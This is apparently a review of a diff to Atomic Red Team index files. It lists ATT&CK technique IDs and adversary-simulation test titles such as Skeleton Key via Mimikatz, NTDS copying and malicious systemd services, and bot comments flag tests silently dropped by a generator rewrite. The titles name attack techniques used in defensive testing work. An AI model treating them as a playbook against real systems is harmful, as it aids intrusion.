- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -375,7 +375,7 @@
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -519,7 +519,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -31,7 +31,7 @@
# command-and-control
- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -80,7 +80,7 @@
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -135,7 +135,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -230,7 +230,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,7 @@
- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -351,13 +351,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -377,7 +377,7 @@
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -522,7 +522,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+16 -65
@@ -54,7 +54,6 @@
- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
- Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
- Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
- Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
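Review bot: Atomic Test #3 (Password-Protected ZIP Payload Extraction and Execution [linux, macos]) disappears from the T1027.013 entry while tests #1 and #2 stay, and the commit message ("python conversion") does not say that a test was retired. If the T1027.013 YAML still contains that test, the new generator is dropping it and the index understates coverage; if the test was removed on purpose, that removal belongs in a separate commit that says so, since the same silent drop happens for T1027 test #11 and T1562.008 test #11 in the next two hunks.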
@@ -699,7 +698,6 @@
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- Atomic Test #11: Obfuscated PowerShell Command via Character Array [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
@@ -772,7 +770,6 @@
- Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
- Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
- Atomic Test #11: AWS - Config Logs Disabled [iaas:aws]
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- Atomic Test #2: Headless Browser Accessing Mockbin [windows]
@@ -785,8 +782,7 @@
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
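Review bot: T1556.001 goes from a linked entry with Atomic Test #1: Skeleton Key via Mimikatz [windows] to a CONTRIBUTE A TEST placeholder, yet the CSV rows earlier in this comparison still list "Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell" under both persistence and credential-access. Both indexes describe the same atomics, so they should agree on whether this test exists; please confirm the T1556.001 test is meant to go, and if it is, remove the CSV rows in the same commit so the two indexes do not diverge.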
@@ -1230,12 +1226,7 @@
- Atomic Test #2: Add launch script to launch daemon [macos]
- Atomic Test #3: Add launch script to launch agent [macos]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
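Review bot: all five T1546.018 tests (the atomic_hook.pth and usercustomize.py hooks for Windows, Linux and macOS) collapse into a CONTRIBUTE A TEST placeholder, so this removes the whole technique from the index rather than a single test. The hunk at -1895 in the second index file shows the identical removal, which points at the generator's input (the T1546.018 YAML failing to load or being excluded) rather than at either index file; fixing the index by hand would not address that.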
@@ -1376,15 +1367,7 @@
- Atomic Test #5: Run Shellcode via Syscall in Go [windows]
- [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
- Atomic Test #1: AutoHotKey script execution [windows]
- [T1569.003 System Services: Systemctl](../../T1569.003/T1569.003.md)
- Atomic Test #1: Create and Enable a Malicious systemd Service Unit [linux]
- Atomic Test #2: Create systemd Service Unit from /tmp (Unusual Location) [linux]
- Atomic Test #3: Create systemd Service Unit from /dev/shm (Unusual Location) [linux]
- Atomic Test #4: Modify Existing systemd Service to Execute Malicious Command [linux]
- Atomic Test #5: Execute Command via Transient systemd Service (systemd-run) [linux]
- Atomic Test #6: Enumerate All systemd Services Using systemctl [linux]
- Atomic Test #7: Enable systemd Service for Persistence with Auto-Restart [linux]
- Atomic Test #8: Masquerade Malicious Service as Legitimate System Service [linux]
- T1569.003 Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
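Review bot: all eight T1569.003 systemctl tests (unit creation from /tmp and /dev/shm, modification of an existing unit, systemd-run, enumeration, auto-restart persistence, service masquerading) are replaced by a single CONTRIBUTE A TEST line, a loss of Linux persistence coverage with no matching change described in the commit message. A generator that cannot load a technique's YAML should fail the build instead of quietly emitting the placeholder; otherwise regressions like this one only surface when someone reads the rendered diff.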
@@ -1590,15 +1573,11 @@
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
- Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
- Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
- Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
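Review bot: the T1137.005 section loses all five existing Outlook Rules tests and reverts to a CONTRIBUTE A TEST placeholder, which reads like a generator regression rather than an intentional removal; unless the corresponding atomics were deleted in this commit, the new Python index builder is not picking that technique up and the index is now out of sync with the atomics tree. In the same hunk the added "Chrome/Chromium (Chrome Web Store)" entry shifts the existing Firefox, Edge and Chrome tests from #2-#4 to #3-#5, so confirm the new numbering matches the order of tests in the T1176 atomic definition before merging, since test numbers are how the entries are referenced.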
@@ -1895,12 +1874,7 @@
- Atomic Test #3: Add launch script to launch agent [macos]
- T1671 Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
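Review bot: T1546.018 Python Startup Hooks drops all five tests at once (Windows, Linux and macOS variants) and becomes CONTRIBUTE A TEST; a whole-technique loss, rather than a partial one, suggests the generator is skipping that technique directory entirely (for example because of a field it does not parse). Run the generator against the current tree and compare with the previous index to confirm whether the drop is intended.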
@@ -1917,8 +1891,7 @@
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- Atomic Test #3: Launch Agent - Root Directory [macos]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
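Review bot: the "Skeleton Key via Mimikatz" test for T1556.001 is removed here and again in the Credential Access hunk further down (the lines around "Access Saved Credentials via VaultCmd"), so a single generator-level cause is likely; the replacement line also changes the label from "Modify Authentication Process: Domain Controller Authentication" to "Domain Controller Authentication", which should be decided deliberately rather than as a side effect of the conversion.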
@@ -1986,8 +1959,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- Atomic Test #3: XOR Encoded data. [windows]
- [T1568.002 Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md)
- Atomic Test #1: DGA Simulation (Python) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
@@ -2014,9 +1986,7 @@
- Atomic Test #13: Splashtop Execution [windows]
- Atomic Test #14: Splashtop Streamer Execution [windows]
- Atomic Test #15: Microsoft App Quick Assist Execution [windows]
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
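Review bot: both T1659 Content Injection tests (MITM Proxy Injection for macOS/Linux and for Windows) are dropped and the technique reverts to CONTRIBUTE A TEST; T1659 is listed under Command and Control here and again under Initial Access later in this file, so verify the atomics still exist and fix the generator once rather than patching both sections by hand.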
@@ -2143,7 +2113,6 @@
- Atomic Test #7: Windows Screencapture [windows]
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
- Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
- Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
@@ -2527,8 +2496,7 @@
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -2541,8 +2509,6 @@
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
- Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
- Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
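Review bot: tests #10 and #11 for T1003.003 (NTDS copy via MFT parsing and via fsutil) vanish with no replacement line. Across this diff it is consistently the highest-numbered tests of each technique that disappear, which points to the generator reading an older snapshot of the atomics rather than the current tree; bisect by regenerating from HEAD and diffing against the previous index before merge.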
@@ -2591,10 +2557,6 @@
- Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
- Atomic Test #1: Device Driver Discovery [windows]
- Atomic Test #2: Device Driver Discovery (Linux) [linux]
- Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
- Atomic Test #4: List loaded kernel extensions (macOS) [macos]
- Atomic Test #5: Find Kernel Extensions (macOS) [macos]
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
@@ -2662,10 +2624,6 @@
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #3: System Service Discovery - systemctl/service [linux]
- Atomic Test #4: Get-Service Execution [windows]
- Atomic Test #5: System Service Discovery - macOS launchctl [macos]
- Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
- Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
- Atomic Test #8: System Service Discovery - Linux init scripts [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
@@ -2799,11 +2757,8 @@
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
- Atomic Test #7: System Discovery using SharpView [windows]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:aws]
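Review bot: three of the seven T1049 tests (Process Mapping, ss/lsof, sockstat) are removed and the surviving "FreeBSD, Linux & MacOS" and "SharpView" entries are renumbered from #5 and #7 to #3 and #4. Renumbering tests that still exist changes which test a given number refers to, so the index must be generated from the live test ordering; if the removed tests are still present in the atomics tree, this hunk should not land.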
@@ -3094,7 +3049,6 @@
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- Atomic Test #2: Windows - Simulate CPU Load with PowerShell [windows]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
@@ -3117,7 +3071,6 @@
- Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
